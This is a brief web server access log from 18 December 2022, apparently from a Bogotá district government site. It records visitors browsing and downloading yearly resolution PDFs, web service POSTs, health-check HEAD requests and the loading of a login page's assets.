190.27.128.131 - - [18/Dec/2022:18:30:15 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.27.128.131 - - [18/Dec/2022:18:30:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 254463
190.27.128.131 - - [18/Dec/2022:18:30:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2831.pdf HTTP/1.1" 200 416017
190.27.128.131 - - [18/Dec/2022:18:30:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2831.pdf HTTP/1.1" 200 416017
190.27.128.131 - - [18/Dec/2022:18:30:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2831.pdf HTTP/1.1" 206 1025
190.27.128.131 - - [18/Dec/2022:18:30:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2831.pdf HTTP/1.1" 206 3072
190.27.128.131 - - [18/Dec/2022:18:30:45 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 435222
201.245.192.253 - - [18/Dec/2022:18:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44250
201.245.192.253 - - [18/Dec/2022:18:30:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44118
201.245.192.253 - - [18/Dec/2022:18:30:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
190.27.128.131 - - [18/Dec/2022:18:31:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 167184
190.27.128.131 - - [18/Dec/2022:18:31:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 273306
216.245.221.92 - - [18/Dec/2022:18:31:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:18:30:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.19 - - [18/Dec/2022:18:32:59 -0500] "GET /distrito-entrego-certificado-de-reconocimiento-a-mas-de-600-mujeres-que-reverdecen-tras-seis-meses-de-formacion-teorica-y-practica.html HTTP/1.1" 206 1113
172.22.2.4 - - [18/Dec/2022:18:31:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
181.237.5.254 - - [18/Dec/2022:18:34:24 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.237.5.254 - - [18/Dec/2022:18:34:24 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.237.5.254 - - [18/Dec/2022:18:34:24 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.237.5.254 - - [18/Dec/2022:18:34:24 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.237.5.254 - - [18/Dec/2022:18:34:24 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
